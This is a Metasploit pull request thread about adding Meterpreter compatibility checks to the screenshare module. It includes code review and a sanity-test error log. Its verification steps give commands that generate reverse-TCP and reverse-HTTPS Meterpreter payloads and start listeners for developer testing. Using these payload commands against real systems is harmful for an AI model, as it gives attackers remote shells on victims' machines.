Add meterpreter compatibility metadata to screenshare module #15669

@adfoster-r7 adfoster-r7 commented Sep 13, 2021

Building on the work of #15295 and #15659

Verification

  1. Get a Python shell:
use payload/python/meterpreter_reverse_tcp
set LHOST 192.168.123.1
generate -o shell.py -f raw
to_handler

Verify validation works as expected:

use multi/manage/screenshare
run session=-1

Expected output:

[!] SESSION may not be compatible with this module (missing Meterpreter features: stdapi_ui_desktop_screenshot, stdapi_ui_send_keyevent, stdapi_ui_send_mouse, espia_image_get_dev_screen)
[*] Using URL: http://127.0.0.1:8080/aKK5njyTRRh
[*] Server started.

  2. Get a Windows shell:
use windows/meterpreter/reverse_https
set LHOST 192.168.123.1
set LPORT 4444
set SessionCommunicationTimeout 0
set ExitOnSession false

# Create the executable to run on the VM
generate -o reverse.exe -f exe

# Create listener
to_handler

Verify validation works as expected:

use multi/manage/screenshare
run session=-1

Expected output:

end
end
missing_cmd_ids -= s.commands
return "missing Meterpreter features: #{command_names_for(missing_cmd_ids)}" unless missing_cmd_ids.empty?
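Review bot: `missing_cmd_ids -= s.commands` depends on the local `s`, so once these lines move into a separate method the session has to be passed in as an argument, or the line rewritten against the new parameter name. The Linux sanity run later in this thread fails with a NameError for `s` raised from `meterpreter_session_incompatibility_reasons`, which is what a missed rename here would produce. Since the extracted method is described as returning an array, the `return "missing Meterpreter features: ..."` string form should also become an append to that array.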
Contributor Author

This was just extracted into a method below, and it returns an array of issues instead of a string

end

# Arch is okay, now check the platform.
if self.platform && self.platform.kind_of?(Msf::Module::PlatformList)
return "incompatible session platform: #{s.platform}" unless self.platform.supports?(Msf::Module::PlatformList.transform(s.platform))
issues << "incompatible session platform: #{s.platform}" unless self.platform.supports?(Msf::Module::PlatformList.transform(s.platform))
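Review bot: replacing the early `return` on the platform check with `issues << ...` means execution now continues past this `if` even for an unsupported platform, so the method has to end by returning `issues` and everything after this point must be safe to run against a mismatched session. The return type seen by callers also changes from a string to an array, which is worth stating in the method's doc comment. Minor: `Msf::Module::PlatformList.transform(s.platform)` could be assigned to a local to shorten the line.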
@adfoster-r7 adfoster-r7 Sep 13, 2021

I wanted to return the potential platform issue, as well as the meterpreter issues, so returning early wasn't the right pattern here for me.

Potential example:

[!] SESSION may not be compatible with this module (incompatible session platform: linux. missing Meterpreter features: stdapi_ui_desktop_screenshot, stdapi_ui_send_keyevent, stdapi_ui_send_mouse, espia_image_get_dev_screen)
[*] Using URL: http://127.0.0.1:8080/WNOheBiKs
[*] Server started.
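
The pattern described in the comment above, collecting every incompatibility reason instead of returning on the first one, as an added Ruby example. It is not code from this pull request or from metasploit-framework; `Session`, `SUPPORTED_PLATFORMS`, `REQUIRED_COMMANDS` and both method names are assumptions made for illustration.

```ruby
# Added illustration; not code from metasploit-framework.
# Session, the two constants and both method names are hypothetical.
Session = Struct.new(:platform, :commands)

SUPPORTED_PLATFORMS = %w[windows osx].freeze # constructed sample list
REQUIRED_COMMANDS = %w[
  stdapi_ui_desktop_screenshot
  stdapi_ui_send_keyevent
  stdapi_ui_send_mouse
].freeze

# Returns an Array of reasons; an empty Array means "compatible".
# No early return: a platform mismatch must not hide missing commands.
def incompatibility_reasons(session)
  issues = []
  unless SUPPORTED_PLATFORMS.include?(session.platform)
    issues << "incompatible session platform: #{session.platform}"
  end
  missing = REQUIRED_COMMANDS - session.commands
  issues << "missing Meterpreter features: #{missing.join(', ')}" unless missing.empty?
  issues
end

# Builds the warning text, or nil when there is nothing to warn about.
# The check uses empty? because an empty Array is truthy in Ruby, so a
# caller written for the old "string or nothing" contract would always warn.
def compatibility_warning(session)
  issues = incompatibility_reasons(session)
  return nil if issues.empty?

  "SESSION may not be compatible with this module (#{issues.join('. ')})"
end

# Constructed sessions: one failing both checks, one passing both.
linux = Session.new('linux', ['stdapi_ui_send_mouse'])
windows = Session.new('windows', REQUIRED_COMMANDS.dup)
puts compatibility_warning(linux)
puts compatibility_warning(windows).inspect
```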

@jmartin-tech

Error from sanity test run for Linux meterpreter:

[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/linux-x64-meterpreter_reverse_tcp-192x168x16x127-30001.rc)> Ruby Code (13 bytes)
resource (/home/msfuser/rapid7/test_artifacts/test_rc/linux-x64-meterpreter_reverse_tcp-192x168x16x127-30001.rc)> run
[*] Setup: changing working directory to /tmp
[-] Post failed: NameError undefined local variable or method `s' for #<Msf::Modules::Post__Test__Meterpreter::MetasploitModule:0x00007f60aa51e3e0>
[-] Call stack:
[-]   /home/msfuser/rapid7/metasploit-framework/lib/msf/core/post_mixin.rb:311:in `meterpreter_session_incompatibility_reasons'
[-]   /home/msfuser/rapid7/metasploit-framework/lib/msf/core/post_mixin.rb:215:in `session_incompatibility_reasons'
[-]   /home/msfuser/rapid7/metasploit-framework/lib/msf/core/post_mixin.rb:52:in `setup'
[-]   /home/msfuser/rapid7/metasploit-framework/lib/msf/core/post.rb:28:in `setup'
[-]   /home/msfuser/rapid7/metasploit-framework/test/modules/post/test/meterpreter.rb:47:in `setup'
[*] Cleanup: changing working directory back to /home/vagrant/payload_test
[*] Cleanup: changing working directory back to /home/vagrant/payload_test
[*] Post module execution completed

@adfoster-r7 adfoster-r7 force-pushed the add-command-meterpreter-compatibility-metadata-to-screenshare-module branch 2 times, most recently from 23d5589 to 49db8b9 Compare September 14, 2021 10:17

@smcintyre-r7 smcintyre-r7 left a comment

Changes look good, just left a few general comments.

@adfoster-r7 adfoster-r7 force-pushed the add-command-meterpreter-compatibility-metadata-to-screenshare-module branch from 49db8b9 to 6072382 Compare September 15, 2021 16:43
@adfoster-r7 adfoster-r7 force-pushed the add-command-meterpreter-compatibility-metadata-to-screenshare-module branch from 797673b to e81f1b5 Compare September 23, 2021 20:10
@adfoster-r7 adfoster-r7 merged commit 959527a into rapid7:master Sep 27, 2021
@adfoster-r7 adfoster-r7 deleted the add-command-meterpreter-compatibility-metadata-to-screenshare-module branch September 27, 2021 14:18
@adfoster-r7
Release Notes

Updates the multi/manage/screenshare module to use the Espia screenshot capabilities if present, and to gracefully fall back to using the normal screenshot behavior if it fails to load as expected.

@erran-r7 erran-r7 added the rn-enhancement release notes enhancement label Oct 1, 2021